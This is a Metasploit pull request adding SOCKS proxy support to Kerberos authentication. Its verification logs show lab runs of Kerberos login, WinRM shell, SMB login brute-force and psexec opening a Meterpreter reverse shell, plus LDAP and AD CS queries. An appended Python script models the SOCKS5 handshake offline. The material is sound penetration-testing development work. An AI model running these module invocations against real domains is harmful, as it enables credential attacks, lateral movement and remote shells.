
Add proxies datastore support for kerberos workflows #18096

Merged



@adfoster-r7 adfoster-r7 commented Jun 13, 2023

Closes #18095

Verification

Machines:

  • 127.0.0.1 - Attacker VM
  • 192.168.123.144 - Pivot, socks5 proxy
  • 10.20.x.x - Remote DC3, not accessible to Attacker

Additionally ran on AttackerVM:

sudo iptables -A INPUT -d 10.20.0.0/24 -j DROP
sudo iptables -A OUTPUT -d 10.20.0.0/24 -j DROP

On the Pivot machine I just ran Metasploit's socks proxy module, since it happened to have msfconsole installed.

Test cases

  • Test kerberos login
msf6 auxiliary(scanner/kerberos/kerberos_login) > rerun rhost=10.20.0.128 username=administrator password=p4$$w0rd5 domaincontrollerrhost=10.20.0.128 domain=adf3.local proxies=socks5:192.168.123.144:1080
[*] Reloading module...

[*] Using domain: ADF3.LOCAL - 10.20.0.128:88       ...
[+] 10.20.0.128 - User found: "administrator" with password p4$$w0rd5. Hash: $krb5asrep$18$administrator@ADF3.LOCAL:bcf5caf4918d5b1a814869fd1bcf62ee$...
[!] No active DB -- Credential data will not be saved!
[*] Auxiliary module execution completed

  • Test winrm_login shell
msf6 auxiliary(scanner/winrm/winrm_login) > rerun rhost=10.20.0.128 username=administrator password=p4$$w0rd5 winrm::auth=kerberos winrm::rhostname=dc3.adf3.local domaincontrollerrhost=10.20.0.128 domain=adf3.local proxies=socks5:192.168.123.144:1080
[*] Reloading module...

[+] 10.20.0.128:88 - Received a valid TGT-Response
[*] 10.20.0.128:5985      - TGT MIT Credential Cache ticket saved to /home/kali/.msf4/loot/20230707060655_default_10.20.0.128_mit.kerberos.cca_628045.bin
[+] 10.20.0.128:88 - Received a valid TGS-Response
[*] 10.20.0.128:5985      - TGS MIT Credential Cache ticket saved to /home/kali/.msf4/loot/20230707060655_default_10.20.0.128_mit.kerberos.cca_605071.bin
[+] 10.20.0.128:88 - Received a valid delegation TGS-Response
[+] 10.20.0.128:88 - Received AP-REQ. Extracting session key...
[!] No active DB -- Credential data will not be saved!
[+] 10.20.0.128:5985 - Login Successful: adf3.local\administrator:p4$$w0rd5
[*] Command shell session 1 opened (192.168.123.132:39719 -> 192.168.123.144:1080) at 2023-07-07 06:06:56 -0400
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/winrm/winrm_login) > sessions

Active sessions
===============

  Id  Name  Type           Information                                    Connection
  --  ----  ----           -----------                                    ----------
  1         shell windows  WinRM administrator:p4$$w0rd5 (ADF3\administr  192.168.123.132:39719 -> 192.168.123.144:1080
                           ator)                                          (10.20.0.128)

msf6 auxiliary(scanner/winrm/winrm_login) > sessions -i -1 -c whoami
[*] Running 'whoami' on shell session -1 (10.20.0.128)
adf3\administrator

  • Test winrm_cmd
msf6 auxiliary(scanner/winrm/winrm_cmd) > rerun rhost=10.20.0.137 username=administrator password=p4$$w0rd5 winrm::auth=kerberos winrm::rhostname=dc3.adf3.local domaincontrollerrhost=10.20.0.137 domain=adf3.local ReverseAllowProxy=true lhost=192.168.123.132  proxies=socks5:192.168.123.144:1080
[*] Reloading module...

[+] 10.20.0.137:88 - Received a valid TGT-Response
[*] 10.20.0.137:5985      - TGT MIT Credential Cache ticket saved to /home/kali/.msf4/loot/20230710131847_default_10.20.0.137_mit.kerberos.cca_482709.bin
[+] 10.20.0.137:88 - Received a valid TGS-Response
[*] 10.20.0.137:5985      - TGS MIT Credential Cache ticket saved to /home/kali/.msf4/loot/20230710131847_default_10.20.0.137_mit.kerberos.cca_664214.bin
[+] 10.20.0.137:88 - Received a valid delegation TGS-Response
[+] 10.20.0.137:88 - Received AP-REQ. Extracting session key...

Windows IP Configuration

   Host Name . . . . . . . . . . . . : dc3
   Primary Dns Suffix  . . . . . . . : adf3.local
   Node Type . . . . . . . . . . . . : Hybrid
   IP Routing Enabled. . . . . . . . : No
   WINS Proxy Enabled. . . . . . . . : No
   DNS Suffix Search List. . . . . . : adf3.local
                                       localdomain


  • Test smb login
msf6 auxiliary(scanner/smb/smb_login) > rerun rhost=10.20.0.137 username=administrator password=p4$$w0rd5 smb::auth=kerberos smb::rhostname=dc3.adf3.local domaincontrollerrhost=10.20.0.137 domain=adf3.local ReverseAllowProxy=true lhost=192.168.123.132  proxies=socks5:192.168.123.144:1080
[*] Reloading module...

[*] 10.20.0.137:445       - 10.20.0.137:445 - Starting SMB login bruteforce
[+] 10.20.0.137:445       - 10.20.0.137:88 - Received a valid TGT-Response
[*] 10.20.0.137:445       - 10.20.0.137:445       - TGT MIT Credential Cache ticket saved to /home/kali/.msf4/loot/20230710130833_default_10.20.0.137_mit.kerberos.cca_042215.bin
[+] 10.20.0.137:445       - 10.20.0.137:88 - Received a valid TGS-Response
[*] 10.20.0.137:445       - 10.20.0.137:445       - TGS MIT Credential Cache ticket saved to /home/kali/.msf4/loot/20230710130836_default_10.20.0.137_mit.kerberos.cca_683880.bin
[+] 10.20.0.137:445       - 10.20.0.137:88 - Received a valid delegation TGS-Response
[+] 10.20.0.137:445       - 10.20.0.137:445 - Success: 'adf3.local\administrator:p4$$w0rd5' Administrator
[!] 10.20.0.137:445       - No active DB -- Credential data will not be saved!
[*] 10.20.0.137:445       - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed


  • Test psexec
msf6 exploit(windows/smb/psexec) > rerun rhost=10.20.0.137 username=administrator password=p4$$w0rd5 smb::auth=kerberos smb::rhostname=dc3.adf3.local domaincontrollerrhost=10.20.0.137 domain=adf3.local ReverseAllowProxy=true lhost=192.168.123.132  proxies=socks5:192.168.123.144:1080
[*] Reloading module...

[*] Started reverse TCP handler on 192.168.123.132:4444 
[*] 10.20.0.137:445 - Connecting to the server...
[*] 10.20.0.137:445 - Authenticating to 10.20.0.137:445|adf3.local as user 'administrator'...
[+] 10.20.0.137:445 - 10.20.0.137:88 - Received a valid TGT-Response
[*] 10.20.0.137:445 - 10.20.0.137:445 - TGT MIT Credential Cache ticket saved to /home/kali/.msf4/loot/20230710130752_default_10.20.0.137_mit.kerberos.cca_594189.bin
[+] 10.20.0.137:445 - 10.20.0.137:88 - Received a valid TGS-Response
[*] 10.20.0.137:445 - 10.20.0.137:445 - TGS MIT Credential Cache ticket saved to /home/kali/.msf4/loot/20230710130755_default_10.20.0.137_mit.kerberos.cca_385182.bin
[+] 10.20.0.137:445 - 10.20.0.137:88 - Received a valid delegation TGS-Response
[*] 10.20.0.137:445 - Selecting PowerShell target
[*] 10.20.0.137:445 - Executing the payload...
[+] 10.20.0.137:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (175686 bytes) to 192.168.123.13
[*] Meterpreter session 6 opened (192.168.123.132:4444 -> 192.168.123.13:64956) at 2023-07-10 13:08:03 -0400

meterpreter > 
  • Test MSSQL
  • Test LDAP - Kerberos tickets work (this PR) - but ldap_query client fails 🔴 Will fix in a separate issue
msf6 auxiliary(gather/ldap_query) > rerun rhost=10.20.0.137 username=administrator password=p4$$w0rd5 ldap::auth=kerberos ldap::rhostname=dc3.adf3.local domaincontrollerrhost=10.20.0.137 domain=adf3.local proxies=socks5:192.168.123.144:1080
[*] Reloading module...
[*] Running module against 10.20.0.137

[+] 10.20.0.137:88 - Received a valid TGT-Response
[*] 10.20.0.137:389 - TGT MIT Credential Cache ticket saved to /home/kali/.msf4/loot/20230710120238_default_10.20.0.137_mit.kerberos.cca_426003.bin
[+] 10.20.0.137:88 - Received a valid TGS-Response
[*] 10.20.0.137:389 - TGS MIT Credential Cache ticket saved to /home/kali/.msf4/loot/20230710120238_default_10.20.0.137_mit.kerberos.cca_291783.bin
[+] 10.20.0.137:88 - Received a valid delegation TGS-Response
[*] Discovering base DN automatically
[+] 10.20.0.137:389 Discovered base DN: DC=adf3,DC=local
[+] 10.20.0.137:389 Discovered schema DN: DC=adf3,DC=local
CN=Administrator CN=Users DC=adf3 DC=local
==========================================

 Name                Attributes
 ----                ----------
 badpwdcount         0
 description         Built-in account for administering the computer/domain
 lastlogoff          1601-01-01 00:00:00 UTC
 lastlogon           2023-07-10 16:02:38 UTC

  • Test ADCS
msf6 auxiliary(admin/ldap/ad_cs_cert_template) > rerun rhost=10.20.0.136 username=administrator password=p4$$w0rd5 ldap::auth=kerberos ldap::rhostname=dc3.adf3.local domaincontrollerrhost=10.20.0.136 domain=adf3.local proxies=socks5:192.168.123.144:1080
[*] Reloading module...
[*] Running module against 10.20.0.136

[+] 10.20.0.136:88 - Received a valid TGT-Response
[*] 10.20.0.136:389 - TGT MIT Credential Cache ticket saved to /home/kali/.msf4/loot/20230710062038_default_10.20.0.136_mit.kerberos.cca_270545.bin
[+] 10.20.0.136:88 - Received a valid TGS-Response
[*] 10.20.0.136:389 - TGS MIT Credential Cache ticket saved to /home/kali/.msf4/loot/20230710062038_default_10.20.0.136_mit.kerberos.cca_801301.bin
[+] 10.20.0.136:88 - Received a valid delegation TGS-Response
[*] Discovering base DN automatically
[+] 10.20.0.136:389 Discovered base DN: DC=adf3,DC=local
[+] Read certificate template data for: CN=User,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=adf3,DC=local
[*] Certificate template data written to: /home/kali/.msf4/loot/20230710062039_default_10.20.0.136_windows.ad.cs.te_131546.json
[*] Certificate Template:
[*]   distinguishedName: CN=User,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=adf3,DC=local
[*]   displayName:       User
[*]   objectGUID:        beea1d7d-241c-4b7d-a632-bac3ce1d3a9d
[*]   msPKI-Certificate-Name-Flag: 0xa6000000
[*]     * CT_FLAG_SUBJECT_ALT_REQUIRE_UPN
[*]     * CT_FLAG_SUBJECT_ALT_REQUIRE_EMAIL
[*]     * CT_FLAG_SUBJECT_REQUIRE_EMAIL
[*]     * CT_FLAG_SUBJECT_REQUIRE_DIRECTORY_PATH
[*]   msPKI-Enrollment-Flag: 0x00000029
[*]     * CT_FLAG_INCLUDE_SYMMETRIC_ALGORITHMS
[*]     * CT_FLAG_PUBLISH_TO_DS
[*]     * CT_FLAG_AUTO_ENROLLMENT
[*]   msPKI-Private-Key-Flag: 0x00000010
[*]     * CT_FLAG_EXPORTABLE_KEY
[*]   msPKI-RA-Signature: 0x00000000
[*]   pKIExtendedKeyUsage:
[*]     * 1.3.6.1.4.1.311.10.3.4
[*]     * 1.3.6.1.5.5.7.3.4
[*]     * 1.3.6.1.5.5.7.3.2
[+] The operation completed successfully!
[*] Auxiliary module execution completed
msf6 auxiliary(admin/dcerpc/icpr_cert) > run rhost=10.20.0.137 smbuser=foo_user smbpass=p4$$w0rd5 ca=adf3-DC3-CA CERT_TEMPLATE=User proxies=socks5:192.168.123.144:1080
[*] Running module against 10.20.0.137

[+] 10.20.0.137:445 - The requested certificate was issued.
[*] 10.20.0.137:445 - Certificate UPN: foo_user@adf3.local
[*] 10.20.0.137:445 - Certificate stored at: /home/kali/.msf4/loot/20230710123835_default_10.20.0.137_windows.ad.cs_608294.pfx
[*] Auxiliary module execution completed

@adfoster-r7 adfoster-r7 force-pushed the add-proxies-datastore-support-to-kerberos branch 2 times, most recently from 521e5dd to e053e9e Compare June 13, 2023 23:58
@adfoster-r7 adfoster-r7 force-pushed the add-proxies-datastore-support-to-kerberos branch from e053e9e to 4287893 Compare June 14, 2023 12:30
@adfoster-r7 adfoster-r7 changed the title Add proxies datastore support to kerberos Add initial proxies datastore support for kerberos workflows Jul 7, 2023
@adfoster-r7 adfoster-r7 force-pushed the add-proxies-datastore-support-to-kerberos branch 3 times, most recently from 4a76d1a to 2751e5a Compare July 10, 2023 22:12
@adfoster-r7 adfoster-r7 marked this pull request as ready for review July 10, 2023 22:59
@adfoster-r7 adfoster-r7 force-pushed the add-proxies-datastore-support-to-kerberos branch from 2751e5a to 85fa1a7 Compare July 21, 2023 09:49
@adfoster-r7 adfoster-r7 force-pushed the add-proxies-datastore-support-to-kerberos branch from 85fa1a7 to 08a2a29 Compare July 21, 2023 10:20
@dwelch-r7 dwelch-r7 merged commit 1af22cf into rapid7:master Jul 21, 2023
33 of 34 checks passed
@dwelch-r7 dwelch-r7 added the rn-enhancement release notes enhancement label Jul 21, 2023

dwelch-r7 commented Jul 21, 2023

Release Notes

Updates the LDAP query module and the Kerberos authentication support for WinRM/MSSQL/SMB/LDAP/etc to now work in conjunction with the user's set Proxies datastore value, i.e. set Proxies socks5:127.0.0.1:1080
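The verification above (an attacker VM that is iptables-DROPped from 10.20.0.0/24, a pivot running a SOCKS5 proxy on 192.168.123.144:1080) and the `set Proxies socks5:127.0.0.1:1080` value in the release notes both rest on one behaviour: when `Proxies` is honoured, the Kerberos client opens its TCP socket to the proxy, not to the KDC, and asks the proxy to connect onward to TCP/88. The script below is an added example, not code from this PR or from Metasploit/Rex. It parses a `Proxies` value in the `type:host:port[,type:host:port...]` form (the comma-separated chain syntax is an assumption about Rex's parser), builds the RFC 1928 SOCKS5 greeting and CONNECT frames for the KDC, and decodes the proxy's reply, including the failure codes a pivot returns when it cannot reach the DC. All addresses and reply bytes are constructed for the example; nothing touches the network.

```python
"""Added example (not from this PR or from Metasploit/Rex): model the SOCKS5
(RFC 1928) exchange a Kerberos client performs when `Proxies` is honoured.
Inputs and proxy replies are constructed bytes; nothing here uses sockets."""
import ipaddress
import struct
from dataclasses import dataclass

SOCKS_VERSION = 0x05
METHOD_NO_AUTH = 0x00
METHOD_NONE_ACCEPTABLE = 0xFF
CMD_CONNECT = 0x01
ATYP_IPV4, ATYP_DOMAIN, ATYP_IPV6 = 0x01, 0x03, 0x04

# Reply codes from RFC 1928 section 6; 0x03-0x05 are what a pivot returns when
# it cannot reach the KDC behind it.
REPLY_TEXT = {
    0x00: "succeeded", 0x01: "general SOCKS server failure",
    0x02: "connection not allowed by ruleset", 0x03: "network unreachable",
    0x04: "host unreachable", 0x05: "connection refused", 0x06: "TTL expired",
    0x07: "command not supported", 0x08: "address type not supported",
}


@dataclass(frozen=True)
class Proxy:
    kind: str
    host: str
    port: int


def parse_proxies(value):
    """Parse "type:host:port[,type:host:port...]" (chain syntax is an assumption
    about Rex's parser); hops are listed in traversal order."""
    chain = []
    for hop in value.split(","):
        hop = hop.strip()
        if not hop:
            continue
        parts = hop.split(":")
        if len(parts) != 3:
            raise ValueError(f"expected type:host:port, got {hop!r}")
        kind, host, port = parts[0].lower(), parts[1], int(parts[2])
        if kind not in ("socks4", "socks5", "http"):
            raise ValueError(f"unsupported proxy type {kind!r}")
        if not 0 < port < 65536:
            raise ValueError(f"port out of range in {hop!r}")
        chain.append(Proxy(kind, host, port))
    if not chain:
        raise ValueError("empty Proxies value")
    return chain


def socks5_greeting():
    """Client hello offering only the no-authentication method."""
    return bytes([SOCKS_VERSION, 0x01, METHOD_NO_AUTH])


def check_method_selection(reply):
    """Validate the proxy's 2-byte method-selection response."""
    if len(reply) != 2 or reply[0] != SOCKS_VERSION:
        raise ValueError("malformed method-selection reply")
    if reply[1] == METHOD_NONE_ACCEPTABLE:
        raise PermissionError("proxy rejected every offered auth method")
    if reply[1] != METHOD_NO_AUTH:
        raise ValueError(f"proxy chose unexpected method 0x{reply[1]:02x}")


def socks5_connect_request(host, port):
    """Build a CONNECT request. Hostnames use the DOMAINNAME address type, so
    the proxy resolves them on its own side of the pivot."""
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        name = host.encode("idna")
        if not 0 < len(name) < 256:
            raise ValueError("hostname must be 1-255 bytes")
        target = bytes([ATYP_DOMAIN, len(name)]) + name
    else:
        target = bytes([ATYP_IPV4 if addr.version == 4 else ATYP_IPV6]) + addr.packed
    return bytes([SOCKS_VERSION, CMD_CONNECT, 0x00]) + target + struct.pack("!H", port)


def parse_connect_reply(reply):
    """Decode the CONNECT reply: return (bound_addr, bound_port) on success,
    raise ConnectionError with the RFC reason on failure."""
    if len(reply) < 5 or reply[0] != SOCKS_VERSION:
        raise ValueError("malformed CONNECT reply")
    rep, atyp = reply[1], reply[3]
    if rep != 0x00:
        reason = REPLY_TEXT.get(rep, "unknown reply code")
        raise ConnectionError(f"SOCKS5 CONNECT failed: {reason} (0x{rep:02x})")
    if atyp == ATYP_IPV4:
        addr_len = 4
    elif atyp == ATYP_IPV6:
        addr_len = 16
    elif atyp == ATYP_DOMAIN:
        addr_len = 1 + reply[4]
    else:
        raise ValueError(f"unknown address type 0x{atyp:02x}")
    if len(reply) != 6 + addr_len:
        raise ValueError("CONNECT reply length does not match address type")
    raw = reply[4:4 + addr_len]
    bound = raw[1:].decode("idna") if atyp == ATYP_DOMAIN else str(ipaddress.ip_address(raw))
    return bound, struct.unpack("!H", reply[4 + addr_len:])[0]


def plan_connect(proxies_value, target_host, target_port=88):
    """Return the (host, port) the client must actually open a TCP socket to,
    plus the ordered frames it sends to reach target_host:target_port through
    every hop. Each hop is asked to CONNECT to the next; the last hop CONNECTs
    to the KDC. Only SOCKS5 hops are modelled."""
    chain = parse_proxies(proxies_value)
    if any(p.kind != "socks5" for p in chain):
        raise NotImplementedError("example only builds SOCKS5 frames")
    targets = [(p.host, p.port) for p in chain[1:]] + [(target_host, target_port)]
    frames = []
    for host, port in targets:
        frames.append(socks5_greeting())
        frames.append(socks5_connect_request(host, port))
    return (chain[0].host, chain[0].port), frames


if __name__ == "__main__":
    # Constructed values mirroring the lab above: pivot proxy, DC's KDC port.
    first_hop, frames = plan_connect("socks5:192.168.123.144:1080", "10.20.0.128", 88)
    print("TCP connect goes to", first_hop, "not the KDC")
    for frame in frames:
        print(frame.hex())
    # Constructed success reply: bound to the pivot's own address, port 1080.
    print(parse_connect_reply(bytes.fromhex("05000001c0a87b900438")))
```

Running it shows that the only socket the client opens is to 192.168.123.144:1080; the KDC address travels inside the CONNECT payload. That is also why the iptables DROP rules in the verification are a sound check: a module that ignores `Proxies` (the bug in #18095) tries a direct connection into 10.20.0.0/24 and hangs, while the fixed module never does.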

@adfoster-r7 adfoster-r7 changed the title Add initial proxies datastore support for kerberos workflows Add proxies datastore support for kerberos workflows Jul 28, 2023
Successfully merging this pull request may close these issues.

auxiliary/scanner/kerberos/kerberos_login doesn't respect Proxies